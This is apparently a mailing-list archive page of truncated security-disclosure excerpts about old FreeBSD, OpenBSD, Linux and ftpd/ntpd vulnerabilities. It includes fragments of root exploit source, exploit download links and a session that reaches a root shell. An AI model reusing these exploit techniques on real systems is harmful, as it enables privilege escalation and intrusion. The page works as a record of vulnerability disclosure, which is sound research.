FreeBSD 6.4 and below are vulnerable to race condition between pipeclose() and
knlist_cleardel() resulting in NULL pointer dereference. The following code
exploits vulnerability to run code in kernel mode, giving root shell and
escaping from jail.
http://www.frasunek.com/pipe.txt
The bug was
FreeBSD 7.2 and below (including 6.4) are vulnerable to race condition in VFS
and devfs code, resulting in NULL pointer dereference. In contrast to pipe race
condition, this vulnerability is actually much harder to exploit.
Due to uninitalised value in devfs_open(), following function is called
Przemyslaw Frasunek pisze:
FreeBSD = 6.1 suffers from classical check/use race condition on SMP
There is yet another kqueue related vulnerability. It affects 6.x, up to
6.4-STABLE. FreeBSD security team was notified on 29th Aug, but there is no
response until now, so I won't publish any details
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
FreeBSD = 6.1 suffers from classical check/use race condition on SMP
systems in kevent() syscall, leading to kernel mode NULL pointer
dereference. It can be triggered by spawning two threads:
1st thread looping on open() and close() syscalls, and the
Tavis Ormandy pisze:
Linux NULL pointer dereference due to incorrect proto_ops initializations
-
Quick and dirty exploit for this one:
http://www.frasunek.com/proto_ops.tgz
--
* Fido: 2:480/124 ** WWW:
Uytkownik Janusz Niewiadomski napisa:
This bug may be non-exploitable if size of the buffer is greater than
MAXPATHLEN characters. This may occur for example if wu-ftpd is compiled
with some versions of Linux kernel where PATH_MAX (and MAXPATHLEN
accordingly) is defined to be exactly 4095
Jonas Eriksson [EMAIL PROTECTED] napisal(a):
o Fixed a security hole in prompt rewriting found by Global InterSec.
Looks like, it won't be easy to exploit.
There are possible few scenarios: using a unlink() or frontlink()
macro in chunk_alloc() or chunk_free(). In both cases we can control
There is a local root compromise in OpenBSD 3.0-current (and below, before 8 Apr
2002).
Full problem report and exploit below. FreeBSD is not vulnerable.
- Forwarded message from [EMAIL PROTECTED] -
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: user/2536: possible root
It still seems to be affected under 3.5beta9 (including this version)
someone said it's not the problem of exploitable vulnerability about 8
month ago ,
FreeBSD is not affected. Problem was fixed 9 months ago and advisory was
issued. See:
http://www.frasunek.com/sources/security/rexec/
This workaround not complete, because it doesn't protect for the bug
exploitation. For example the attacker can send the shellcode via stdin
to the suid program. It's address can also be determined with removing
the suid bit from the program,
Well, after a bunch of tests I've found only two suids which gave me
suid shell:
/usr/bin/passwd
/usr/local/bin/ssh1
/usr/bin/su also works for me:
riget:venglin:~ egrep -e execl vvfreebsd.c
if(!execl(/usr/bin/su,su,szymon,0))
riget:venglin:~ ./v
vvfreebsd. Written by Georgi Guninski
This problem has fixed and the exploit didn't work for last
4.3-RELEASE FreeBSD.
Exploit *works* even for 4.3-STABLE, before correction date (2 Jul 2001):
riget:venglin:~ ./v
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe72
child=57660
Password:done
# id
uid=0(root)
FreeBSD 4.3 local root, yet Linux and *BSD much better than Windows
This problem was already reported to FreeBSD Security Officer about two
months ago, but it was totally ignored.
--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: [EMAIL PROTECTED] ** PGP:
On Thu, Jun 14, 2001 at 05:14:46PM +0300, Georgi Guninski wrote:
OpenBSD 2.9,2.8
Have not tested on other OSes but they may be vulnerable
FreeBSD 4.3-STABLE isn't vulnerable. Looks like it's dropping set[ug]id
privileges before allowing detach.
--
* Fido: 2:480/124 ** WWW:
On Tue, Apr 24, 2001 at 01:09:59PM +0300, Atro Tossavainen wrote:
My colleague reports that NetWare servers running Mercury 1.48 crash
happily.
I've tested it on Mercury 1.48 on Netware 4.10 and it crashed. Mercury 1.48
on Netware 4.11 didn't crashed.
--
* Fido: 2:480/124 ** WWW:
On Sat, Apr 21, 2001 at 10:52:15AM +0200, Przemyslaw Frasunek wrote:
All versions of widely-used POP3 server from Mercury MTA package for Netware
are vulnerable to remote buffer overflow allowing to crash Netware server:
Actually, problem was fixed in Mercury 1.48, but no advisory was issued
On Sat, Apr 14, 2001 at 04:41:43PM -0400, fish stiqz wrote:
If anyone gets this working on other systems, let me know.
This is another version of globbing exploit, written about week ago. It
creates only one directory.
#!/usr/bin/perl
On Thu, Apr 05, 2001 at 10:56:45PM -0500, Stephen Clouse wrote:
Having no effect on ntp-4.0.99k compiled from official source on Slackware
7.0. Exploit says /tmp/sh was spawned but it never actually runs (/bin/bash
mode didn't change).
As I said, exploiting this overflow isn't so easy --
/* ntpd remote root exploit / babcia padlina ltd. [EMAIL PROTECTED] */
/*
* Network Time Protocol Daemon (ntpd) shipped with many systems is vulnerable
* to remote buffer overflow attack. It occurs when building response for
* a query with large readvar argument. In almost all cases, ntpd is
On Wed, Mar 07, 2001 at 04:40:05AM +0100, Nomen Nescio wrote:
this is an exploit for wu-ftpd 2.6.1(1) on linux
propz to segv for giving this to me
This is an old wuftpd 2.6.0 SITE EXEC exploit. 2.6.1 is not vulnerable
to this attack.
strcpy (cmdbuf, "SITE EXEC ");
for (ret = 0; ret =
On Fri, Feb 02, 2001 at 03:04:31PM -0800, Kris Kennaway wrote:
BTW. Old BSD derived ftpd is also used in opieftpd and SSLftpd. Both are
vulnerable to this attack.
In case anyone is wondering how old is old:
The same problem persists in heimdal / kerberosIV ftpd implementation:
Another examples of bad coding in ftp daemons, proftpd-1.2.0rc2 in this case.
main.c:659:
void main_exit(void *pv, void *lv, void *ev, void *dummy)
{
int pri = (int) pv;
char *log = (char *) lv;
int exitcode = (int) ev;
log_pri(pri, log); /* here */
main_exit() is called by
Hello,
There are two non-exploitable format string bugs in wuftpd 2.6.1.
ftpd.c:6272
if (debug) {
char *s = calloc(128 + strlen(remoteident), sizeof(char));
if (s) {
int i = ntohs(pasv_addr.sin_port);
sprintf(s, "PASV port %i assigned to %s", i,
_
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 3
Advisory Name: libncurses buffer overflow
Date: 24/4/00
/* (c) 2000 babcia padlina / buffer0verfl0w security (www.b0f.com) */
/* freebsd mtr-0.41 local root exploit */
#include stdio.h
#include sys/param.h
#include sys/stat.h
#include string.h
#define NOP 0x90
#define BUFSIZE 1
#define ADDRS 1200
long getesp(void)
On 02-Mar-2000 Derek Callaway wrote:
I believe this overflow is rather difficult to exploit, (although, not
impossible) as a result of a setuid(getuid()) before the offending code
it does setuid(), but NOT setgid(). still vulnerable.
the major problem is how to pass valid **envp to stack and
/*
* (c) 2000 babcia padlina / b0f
* (lcamtuf's idea)
*
* redhat 6.1 /usr/bin/man exploit
*/
#include stdio.h
#include sys/param.h
#include sys/stat.h
#include string.h
#define NOP 0x90
#define OFS 1800
#define BUFSIZE 4002
#define ADDRS 1000
long
-BEGIN PGP SIGNED MESSAGE-
Babcia Padlina Ltd. Security Advisory (BP-9909:00)
~~
Synopsis:
Cfingerd is vulnerable to local buffer overflow attack.
Vulnerable versions:
Cfingerd 1.4.2 and
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
/*
* babcia padlina ltd. (poland, 17/08/99)
*
* your ultimate proftpd pre0-3 exploiting toolkit
*
* based on:
* - adm-wuftpd by duke
* - kombajn do czereni by Lam3rZ (thx for shellcode!)
*
* thx and greetz.
*/
#include
29 matches
Mail list logo